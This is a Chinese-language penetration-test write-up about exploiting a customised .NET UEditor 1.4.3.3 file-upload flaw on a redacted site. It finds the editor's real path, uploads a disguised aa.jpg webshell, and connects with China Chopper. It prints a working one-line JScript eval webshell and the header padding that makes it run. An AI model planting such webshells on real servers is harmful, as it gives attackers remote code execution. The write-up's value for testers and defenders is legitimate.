佛学的魔改.net Ueditor

前几天在驻场时候遇到一个套娃的站,一个站里面套了N多个站,域名相同,根据不同的子目录进行区分,由于现在已经修复了,只能尽量还原当时的场景来写这文章。

网站上传点对上传的文件进行了二次渲染,此处无法绕过,只能寻找其他突破口(因为套了不少站,浪费大量时间)。

翻功能的时候,在一个站点找到这么一个编辑器,是不是很眼熟。

20191211_佛学的魔改.net Ueditor

通过fd抓包获取到编辑器路径为:

https://xxx.xxx.com.cn/crm9000/HtmlControl/ueditor1.4.3.3/

果断用exp去打,结果访问漏洞地址的时候,发现404。

20191211_佛学的魔改.net Ueditor

查看上传功能,发现上传功能也无法正常使用,提示后端配置项无法正常加载。

20191211_佛学的魔改.net Ueditor

查看配置文件,感觉也没有问题呀,此时有点郁闷。

20191211_佛学的魔改.net Ueditor

在牧马大佬的提示下,仔细查看js和流量。首先查看js,发现此处加载了一个Add.js文件。

20191211_佛学的魔改.net Ueditor

打开这个js文件,找到了ueditor的真实路径。

20191211_佛学的魔改.net Ueditor

但是去访问的时候,发现地址无法访问。

20191211_佛学的魔改.net Ueditor

通过查看加载编辑器时的网络包,可以看到这也是后端配置项无法正常加载的原因。

20191211_佛学的魔改.net Ueditor

然后尝试直接拼接编辑器路径到域名上,发现访问成功,原来是开发配置得有问题,多加了端口。

20191211_佛学的魔改.net Ueditor

既然能够正常访问,那我就不客气了,拿exp干他,先在服务器上丢个aa.jpg的一句话马。

20191211_佛学的魔改.net Ueditor

上传成功,返回的路径为:upload/image/201912/11/6371165485276351045218627.aspx(记住这个该死的路径,等下要懵逼。)

20191211_佛学的魔改.net Ueditor

接下来就是寻找路径了,我tm找了半个多小时呀,拼接了各种路径,都没找到。。。

后来实在无奈,继续去查看配置文件,看到配置文件的时候,人是懵逼的,路径是对的呀,但感觉总有哪里不对劲。

20191211_佛学的魔改.net Ueditor

然后不信这个邪,又重新上传了一次,发现此时返回的路径是

upload/image/20191211/6371165520599596974371346.aspx

20191211_佛学的魔改.net Ueditor

仔细一看,我tm,第一次返回的路径中那个’/‘哪来的,感情是给我返回了一个假路径给我,我就说配置文件看着哪里不对劲,原来是路径规则。

20191211_佛学的魔改.net Ueditor

但是访问shell的时候,报了一个错,第一次遇到这种问题。

20191211_佛学的魔改.net Ueditor

直接在aa.jpg里面加上<head runat="server" />,再上传,浏览器访问的时候就正常了,但是菜刀连接的时候,又报了这一堆东西(同事复现的时候,菜刀直接连接成功,佛学)。

1
2
3
4
<head>
<link href="../../../../../../../App_Themes/default/default.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/EnStyle.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/Style.css" type="text/css" rel="stylesheet" /><title>

</title></head>

继续把这些加到aa.jpg内容里,最后,aa.jpg内容为:

1
2
3
4
5
6
<head runat="server" />
<link href="../../../../../../../App_Themes/default/default.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/EnStyle.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/Style.css" type="text/css" rel="stylesheet" /><title>

</title></head>

<%@ Page Language="Jscript"%><%eval(Request.Item["g"],"unsafe");%>

上传成功后,菜刀连接成功。

20191211_佛学的魔改.net Ueditor

-------------本文结束感谢您的阅读-------------